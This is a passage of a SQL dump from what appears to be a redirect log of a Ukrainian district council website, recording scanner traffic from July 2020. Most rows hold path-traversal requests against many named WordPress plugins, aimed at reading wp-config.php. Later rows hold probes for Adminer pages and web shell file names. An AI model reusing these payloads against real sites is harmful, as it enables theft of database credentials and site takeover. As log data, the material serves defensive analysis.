00:00:00',301),(35548,'https://malyn-rayrada.gov.ua/wp-content/plugins/backup/archive/predicate.php?bkpwp_plugin_path=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:00','0000-00-00 00:00:00',301),(35549,'https://malyn-rayrada.gov.ua/wp-content/plugins/backup/archive/reader.php?bkpwp_plugin_path=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:08','0000-00-00 00:00:00',301),(35550,'https://malyn-rayrada.gov.ua/wp-content/plugins/backup/archive/writer.php?bkpwp_plugin_path=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:14','0000-00-00 00:00:00',301),(35551,'https://malyn-rayrada.gov.ua/wp-content/plugins/enigma2.php?boarddir=../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:20','0000-00-00 00:00:00',301),(35552,'https://malyn-rayrada.gov.ua/wp-content/plugins/abtest/abtest_admin.php?action=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:28','0000-00-00 00:00:00',301),(35553,'https://malyn-rayrada.gov.ua/wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:29','0000-00-00 00:00:00',301),(35554,'https://malyn-rayrada.gov.ua/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:36','0000-00-00 00:00:00',301),(35555,'https://malyn-rayrada.gov.ua/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:49','0000-00-00 00:00:00',301),(35556,'https://malyn-rayrada.gov.ua/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?abspath=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:13:58','0000-00-00 00:00:00',301),(35557,'https://malyn-rayrada.gov.ua/wp-content/plugins/annonces/includes/lib/photo/uploadphoto.php?abspath=../../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:04','0000-00-00 00:00:00',301),(35558,'https://malyn-rayrada.gov.ua/wp-content/plugins/apptha-slider-gallery/asgalldownload.php?imgname=../../../wp-load.php',NULL,'','',1,0,'2020-07-16 03:14:11','0000-00-00 00:00:00',301),(35559,'https://malyn-rayrada.gov.ua/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:16','0000-00-00 00:00:00',301),(35560,'https://malyn-rayrada.gov.ua/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:19','0000-00-00 00:00:00',301),(35561,'https://malyn-rayrada.gov.ua/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:24','0000-00-00 00:00:00',301),(35562,'https://malyn-rayrada.gov.ua/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:32','0000-00-00 00:00:00',301),(35563,'https://malyn-rayrada.gov.ua/wp-content/plugins/candidate-application-form/downloadpdffile.php?filename=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:38','0000-00-00 00:00:00',301),(35564,'https://malyn-rayrada.gov.ua/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:43','0000-00-00 00:00:00',301),(35565,'https://malyn-rayrada.gov.ua/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:49','0000-00-00 00:00:00',301),(35566,'https://malyn-rayrada.gov.ua/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:14:54','0000-00-00 00:00:00',301),(35567,'https://malyn-rayrada.gov.ua/wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogurl=asdf&abspath=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:01','0000-00-00 00:00:00',301),(35568,'https://malyn-rayrada.gov.ua/wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=../../../wp-config.php&currdir=/wp-content/plugins/dm-albums/',NULL,'','',1,0,'2020-07-16 03:15:07','0000-00-00 00:00:00',301),(35569,'https://malyn-rayrada.gov.ua/wp-content/plugins/dm-albums/template/album.php?security_file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:13','0000-00-00 00:00:00',301),(35570,'https://malyn-rayrada.gov.ua/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:19','0000-00-00 00:00:00',301),(35571,'https://malyn-rayrada.gov.ua/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:22','0000-00-00 00:00:00',301),(35572,'https://malyn-rayrada.gov.ua/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:25','0000-00-00 00:00:00',301),(35573,'https://malyn-rayrada.gov.ua/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:29','0000-00-00 00:00:00',301),(35574,'https://malyn-rayrada.gov.ua/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxaction=getids&cfg=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:30','0000-00-00 00:00:00',301),(35575,'https://malyn-rayrada.gov.ua/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:36','0000-00-00 00:00:00',301),(35576,'https://malyn-rayrada.gov.ua/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10',NULL,'','',1,0,'2020-07-16 03:15:43','0000-00-00 00:00:00',301),(35577,'https://malyn-rayrada.gov.ua/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:47','0000-00-00 00:00:00',301),(35578,'https://malyn-rayrada.gov.ua/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:51','0000-00-00 00:00:00',301),(35579,'https://malyn-rayrada.gov.ua/wp-content/plugins/image-export/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:15:57','0000-00-00 00:00:00',301),(35580,'https://malyn-rayrada.gov.ua/wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:03','0000-00-00 00:00:00',301),(35581,'https://malyn-rayrada.gov.ua/wp-content/plugins/jquery-mega-menu/skin.php?skin=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:10','0000-00-00 00:00:00',301),(35582,'https://malyn-rayrada.gov.ua/wp-content/plugins/justified-image-grid/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:16','0000-00-00 00:00:00',301),(35583,'https://malyn-rayrada.gov.ua/wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=../../../wp-config.php&action=asdf',NULL,'','',1,0,'2020-07-16 03:16:22','0000-00-00 00:00:00',301),(35584,'https://malyn-rayrada.gov.ua/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:28','0000-00-00 00:00:00',301),(35585,'https://malyn-rayrada.gov.ua/wp-content/plugins/mac-photo-gallery/macdownload.php?albid=../../../wp-load.php',NULL,'','',1,0,'2020-07-16 03:16:33','0000-00-00 00:00:00',301),(35586,'https://malyn-rayrada.gov.ua/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:40','0000-00-00 00:00:00',301),(35587,'https://malyn-rayrada.gov.ua/wp-content/plugins/mailz/lists/config/config.php?wpabspath=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:47','0000-00-00 00:00:00',301),(35588,'https://malyn-rayrada.gov.ua/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:49','0000-00-00 00:00:00',301),(35589,'https://malyn-rayrada.gov.ua/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:53','0000-00-00 00:00:00',301),(35590,'https://malyn-rayrada.gov.ua/wp-content/plugins/myflash/myflash-button.php?wppath=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:16:57','0000-00-00 00:00:00',301),(35591,'https://malyn-rayrada.gov.ua/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mypath=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:17:07','0000-00-00 00:00:00',301),(35592,'https://malyn-rayrada.gov.ua/wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:17:16','0000-00-00 00:00:00',301),(35593,'https://malyn-rayrada.gov.ua/wp-content/plugins/page-flip-image-gallery/books/getconfig.php?book_id=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:17:21','0000-00-00 00:00:00',301),(35594,'https://malyn-rayrada.gov.ua/wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:17:28','0000-00-00 00:00:00',301),(35595,'https://malyn-rayrada.gov.ua/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:17:35','0000-00-00 00:00:00',301),(35596,'https://malyn-rayrada.gov.ua/wp-content/plugins/pictpress/resize.php?size=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:17:42','0000-00-00 00:00:00',301),(35597,'https://malyn-rayrada.gov.ua/wp-content/plugins/plugin-newsletter/preview.php?data=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:17:49','0000-00-00 00:00:00',301),(35598,'https://malyn-rayrada.gov.ua/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:17:55','0000-00-00 00:00:00',301),(35599,'https://malyn-rayrada.gov.ua/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:02','0000-00-00 00:00:00',301),(35600,'https://malyn-rayrada.gov.ua/wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:06','0000-00-00 00:00:00',301),(35601,'https://malyn-rayrada.gov.ua/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:08','0000-00-00 00:00:00',301),(35602,'https://malyn-rayrada.gov.ua/wp-content/plugins/robotcpa/f.php?l=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:14','0000-00-00 00:00:00',301),(35603,'https://malyn-rayrada.gov.ua/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:19','0000-00-00 00:00:00',301),(35604,'https://malyn-rayrada.gov.ua/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:24','0000-00-00 00:00:00',301),(35605,'https://malyn-rayrada.gov.ua/wp-content/plugins/sell-downloads/sell-downloads.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:32','0000-00-00 00:00:00',301),(35606,'https://malyn-rayrada.gov.ua/wp-content/plugins/sf-booking/lib/downloads.php?file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:37','0000-00-00 00:00:00',301),(35607,'https://malyn-rayrada.gov.ua/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:53','0000-00-00 00:00:00',301),(35608,'https://malyn-rayrada.gov.ua/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:18:58','0000-00-00 00:00:00',301),(35609,'https://malyn-rayrada.gov.ua/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:05','0000-00-00 00:00:00',301),(35610,'https://malyn-rayrada.gov.ua/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:12','0000-00-00 00:00:00',301),(35611,'https://malyn-rayrada.gov.ua/wp-content/plugins/site-import/admin/page.php?url=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:16','0000-00-00 00:00:00',301),(35612,'https://malyn-rayrada.gov.ua/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:21','0000-00-00 00:00:00',301),(35613,'https://malyn-rayrada.gov.ua/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:26','0000-00-00 00:00:00',301),(35614,'https://malyn-rayrada.gov.ua/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:32','0000-00-00 00:00:00',301),(35615,'https://malyn-rayrada.gov.ua/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:39','0000-00-00 00:00:00',301),(35616,'https://malyn-rayrada.gov.ua/wp-content/plugins/thecartpress/checkout/checkouteditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:45','0000-00-00 00:00:00',301),(35617,'https://malyn-rayrada.gov.ua/wp-content/plugins/thinkun-remind/exportdata.php?dirpath=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:50','0000-00-00 00:00:00',301),(35618,'https://malyn-rayrada.gov.ua/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:19:57','0000-00-00 00:00:00',301),(35619,'https://malyn-rayrada.gov.ua/wp-content/plugins/ungallery/source_vuln.php?pic=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:20:06','0000-00-00 00:00:00',301),(35620,'https://malyn-rayrada.gov.ua/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:20:14','0000-00-00 00:00:00',301),(35621,'https://malyn-rayrada.gov.ua/wp-content/plugins/wechat-broadcast/wechat/image.php?url=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:20:22','0000-00-00 00:00:00',301),(35622,'https://malyn-rayrada.gov.ua/wp-content/plugins/wordtube/wordtube-button.php?wppath=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:20:29','0000-00-00 00:00:00',301),(35623,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-custom-pages/wp-download.php?url=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:20:37','0000-00-00 00:00:00',301),(35624,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:20:44','0000-00-00 00:00:00',301),(35625,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../../../&filename=wp-config.php&action=download',NULL,'','',1,0,'2020-07-16 03:20:50','0000-00-00 00:00:00',301),(35626,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:20:57','0000-00-00 00:00:00',301),(35627,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-lytebox/main.php?pg=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:21:07','0000-00-00 00:00:00',301),(35628,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:21:15','0000-00-00 00:00:00',301),(35629,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php',NULL,'','',1,0,'2020-07-16 03:21:22','0000-00-00 00:00:00',301),(35630,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-publication-archive/includes/openfile.php?file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:21:30','0000-00-00 00:00:00',301),(35631,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:21:36','0000-00-00 00:00:00',301),(35632,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-swimteam/include/user/download.php?file=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:21:43','0000-00-00 00:00:00',301),(35633,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:21:55','0000-00-00 00:00:00',301),(35634,'https://malyn-rayrada.gov.ua/wp-content/plugins/wpeasystats/export.php?homep=../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:05','0000-00-00 00:00:00',301),(35635,'https://malyn-rayrada.gov.ua/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:10','0000-00-00 00:00:00',301),(35636,'https://malyn-rayrada.gov.ua/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:11','0000-00-00 00:00:00',301),(35637,'https://malyn-rayrada.gov.ua/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:11','0000-00-00 00:00:00',301),(35638,'https://malyn-rayrada.gov.ua/wp-includes/functions.php?file=../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:17','0000-00-00 00:00:00',301),(35639,'https://malyn-rayrada.gov.ua/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:24','0000-00-00 00:00:00',301),(35640,'https://malyn-rayrada.gov.ua/wp-content/plugins/wordfence/lib/wordfenceclass.php?file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:29','0000-00-00 00:00:00',301),(35641,'https://malyn-rayrada.gov.ua/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:35','0000-00-00 00:00:00',301),(35642,'https://malyn-rayrada.gov.ua/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:40','0000-00-00 00:00:00',301),(35643,'https://malyn-rayrada.gov.ua/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:47','0000-00-00 00:00:00',301),(35644,'https://malyn-rayrada.gov.ua/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:53','0000-00-00 00:00:00',301),(35645,'https://malyn-rayrada.gov.ua/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:22:56','0000-00-00 00:00:00',301),(35646,'https://malyn-rayrada.gov.ua/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:23:03','0000-00-00 00:00:00',301),(35647,'https://malyn-rayrada.gov.ua/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:23:10','0000-00-00 00:00:00',301),(35648,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:23:16','0000-00-00 00:00:00',301),(35649,'https://malyn-rayrada.gov.ua/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=../../../../../wp-config.php',NULL,'','',1,0,'2020-07-16 03:23:22','0000-00-00 00:00:00',301),(35650,'https://malyn-rayrada.gov.ua/adminer-4.7.4-mysql-en.php',NULL,'','',1,0,'2020-07-16 04:35:39','0000-00-00 00:00:00',301),(35651,'https://www.malyn-rayrada.gov.ua/index.php/1901-malinske-rajonne-upravlinnya-golovnogo-upravlinnya-derzhprodspozhivsluzhbi-v-zhitomirskij-oblasti-informue',NULL,'','',6,0,'2020-07-16 08:08:43','0000-00-00 00:00:00',301),(35652,'https://malyn-rayrada.gov.ua/adminer-4.7.5-mysql-en.php',NULL,'','',1,0,'2020-07-17 01:18:34','0000-00-00 00:00:00',301),(35653,'https://malyn-rayrada.gov.ua/adminer-4.7.6-mysql-en.php',NULL,'','',1,0,'2020-07-17 22:06:49','0000-00-00 00:00:00',301),(35654,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/templates/rada2019yt/favicon.ico',NULL,'','',1,0,'2020-07-18 09:57:37','0000-00-00 00:00:00',301),(35655,'https://www.malyn-rayrada.gov.ua/index.php/1961-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-23-sesiyu-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2020-07-18 18:20:35','0000-00-00 00:00:00',301),(35656,'https://malyn-rayrada.gov.ua/index.php/1917-malinske-rajonne-upravlinnya-golovnogo-upravlinnya-derzhprodspozhivsluzhbi-v-zhitomirskij-oblasti-informue-profilaktika-gripu-ta-grvi',NULL,'','',5,0,'2020-07-18 21:04:18','0000-00-00 00:00:00',301),(35657,'https://malyn-rayrada.gov.ua/language/css.php',NULL,'http://site.ru','',2,0,'2020-07-19 10:29:49','0000-00-00 00:00:00',301),(35658,'https://malyn-rayrada.gov.ua/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87.php',NULL,'http://site.ru','',2,0,'2020-07-19 10:58:00','0000-00-00 00:00:00',301),(35659,'https://malyn-rayrada.gov.ua/list.php',NULL,'http://site.ru','',1,0,'2020-07-19 12:40:21','0000-00-00 00:00:00',301),(35660,'https://malyn-rayrada.gov.ua/images/banners/images.php',NULL,'http://site.ru','',2,0,'2020-07-19 13:02:28','0000-00-00 00:00:00',301),(35661,'https://malyn-rayrada.gov.ua/libraries/joomla/feed/zcysjindex.php',NULL,'http://site.ru','',1,0,'2020-07-19 16:45:47','0000-00-00 00:00:00',301),(35662,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/elements.php',NULL,'http://site.ru','',2,0,'2020-07-19 19:03:03','0000-00-00 00:00:00',301),(35663,'https://malyn-rayrada.gov.ua/images/images.php',NULL,'http://site.ru','',2,0,'2020-07-19 23:29:58','0000-00-00 00:00:00',301),(35664,'https://malyn-rayrada.gov.ua/wp-lgoin.php',NULL,'http://site.ru','',1,0,'2020-07-20 00:35:07','0000-00-00 00:00:00',301),(35665,'https://malyn-rayrada.gov.ua/cache/wp_asx.php',NULL,'http://site.ru','',2,0,'2020-07-20 01:18:18','0000-00-00 00:00:00',301),(35666,'https://malyn-rayrada.gov.ua/plugins/plugins.php',NULL,'http://site.ru','',2,0,'2020-07-20 01:43:31','0000-00-00 00:00:00',301),(35667,'https://malyn-rayrada.gov.ua/components/com_contact/views/contact/tmpl/controller.php',NULL,'http://site.ru','',1,0,'2020-07-20 05:20:43','0000-00-00 00:00:00',301),(35668,'https://malyn-rayrada.gov.ua/50.php',NULL,'http://site.ru','',1,0,'2020-07-20 06:24:58','0000-00-00 00:00:00',301),(35669,'https://malyn-rayrada.gov.ua/components/metadata.php',NULL,'http://site.ru','',2,0,'2020-07-20 08:36:22','0000-00-00 00:00:00',301),(35670,'https://malyn-rayrada.gov.ua/1index.php',NULL,'http://site.ru','',3,0,'2020-07-20 09:06:26','0000-00-00 00:00:00',301),(35671,'https://malyn-rayrada.gov.ua/-/~/code87/5.php',NULL,'http://site.ru','',1,0,'2020-07-20 11:34:33','0000-00-00 00:00:00',301),(35672,'https://malyn-rayrada.gov.ua/components/com_media/mark.php',NULL,'http://site.ru','',2,0,'2020-07-20 12:28:38','0000-00-00 00:00:00',301),(35673,'https://malyn-rayrada.gov.ua/controller.php',NULL,'http://site.ru','',1,0,'2020-07-20 15:05:25','0000-00-00 00:00:00',301),(35674,'https://malyn-rayrada.gov.ua/wp-content/plugins/background-image-cropper/doc.php',NULL,'http://site.ru','',1,0,'2020-07-20 18:05:11','0000-00-00 00:00:00',301),(35675,'https://malyn-rayrada.gov.ua/wp-includes/simplepie/canonical.php',NULL,'http://site.ru','',4,0,'2020-07-20 18:39:13','0000-00-00 00:00:00',301),(35676,'https://malyn-rayrada.gov.ua/wp-content/uploads/2020/05/content-post.php',NULL,'http://site.ru','',1,0,'2020-07-20 19:12:10','0000-00-00 00:00:00',301),(35677,'https://malyn-rayrada.gov.ua/wp-admin/user/include.php',NULL,'http://site.ru','',2,0,'2020-07-20 20:22:45','0000-00-00 00:00:00',301),(35678,'https://malyn-rayrada.gov.ua/wp-content/plugins/freedom/file.php',NULL,'http://site.ru','',1,0,'2020-07-20 20:24:02','0000-00-00 00:00:00',301),(35679,'https://malyn-rayrada.gov.ua/wp-content/uploads/2019/03/blackhat.php',NULL,'http://site.ru','',1,0,'2020-07-20 20:47:10','0000-00-00 00:00:00',301),(35680,'https://malyn-rayrada.gov.ua/olariaemcuritiba.com.br/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-20 20:47:35','0000-00-00 00:00:00',301),(35681,'https://malyn-rayrada.gov.ua/wp-includes/simplepie/pattern.php',NULL,'http://site.ru','',3,0,'2020-07-20 21:12:47','0000-00-00 00:00:00',301),(35682,'https://malyn-rayrada.gov.ua/wp-includes/requests/cookie/images.php',NULL,'http://site.ru','',2,0,'2020-07-20 21:17:00','0000-00-00 00:00:00',301),(35683,'https://malyn-rayrada.gov.ua/wp-content/plugins/background-image-cropper/ups.php',NULL,'http://site.ru','',1,0,'2020-07-20 21:43:48','0000-00-00 00:00:00',301),(35684,'https://malyn-rayrada.gov.ua/backup_2/wp-admin/includes/.e8097.php',NULL,'http://site.ru','',1,0,'2020-07-20 22:08:37','0000-00-00 00:00:00',301),(35685,'https://malyn-rayrada.gov.ua/wp-content/uploads/2020/06/ups.php',NULL,'http://site.ru','',1,0,'2020-07-20 22:39:47','0000-00-00 00:00:00',301),(35686,'https://malyn-rayrada.gov.ua/wp-content/uploads/2020/07/ups.php',NULL,'http://site.ru','',1,0,'2020-07-20 22:59:29','0000-00-00 00:00:00',301),(35687,'https://malyn-rayrada.gov.ua/wp-admin/_admin.php',NULL,'http://site.ru','',2,0,'2020-07-20 23:52:49','0000-00-00 00:00:00',301),(35688,'https://malyn-rayrada.gov.ua/wp-content/wp-muen.php',NULL,'http://site.ru','',1,0,'2020-07-21 00:48:31','0000-00-00 00:00:00',301),(35689,'https://malyn-rayrada.gov.ua/wp-content/themes/aemi1/footer1.php',NULL,'http://site.ru','',1,0,'2020-07-21 02:30:56','0000-00-00 00:00:00',301),(35690,'https://malyn-rayrada.gov.ua/ywdaxprdli.php',NULL,'http://site.ru','',1,0,'2020-07-21 03:56:07','0000-00-00 00:00:00',301),(35691,'https://malyn-rayrada.gov.ua/wp-content/list.php',NULL,'http://site.ru','',2,0,'2020-07-21 04:15:34','0000-00-00 00:00:00',301),(35692,'https://malyn-rayrada.gov.ua/wp-content/plugins/contact-form-1.2/dex.php',NULL,'http://site.ru','',2,0,'2020-07-21 06:59:50','0000-00-00 00:00:00',301),(35693,'https://malyn-rayrada.gov.ua/wp-content/uploads/2020/05/blackhat.php',NULL,'http://site.ru','',3,0,'2020-07-21 07:24:50','0000-00-00 00:00:00',301),(35694,'https://malyn-rayrada.gov.ua/wp-content/plugins/background-image-cropper/content-post.php',NULL,'http://site.ru','',2,0,'2020-07-21 07:25:49','0000-00-00 00:00:00',301),(35695,'https://malyn-rayrada.gov.ua/wp-content/plugins/background-image-cropper/wp-plugins.php',NULL,'http://site.ru','',3,0,'2020-07-21 08:42:23','0000-00-00 00:00:00',301),(35696,'https://malyn-rayrada.gov.ua/wp-admin/includes/class-wp-filesystem-import.php',NULL,'http://site.ru','',2,0,'2020-07-21 08:57:58','0000-00-00 00:00:00',301),(35697,'https://malyn-rayrada.gov.ua/wp-includes/theme-compat/sidebar-embed.php',NULL,'http://site.ru','',2,0,'2020-07-21 11:49:11','0000-00-00 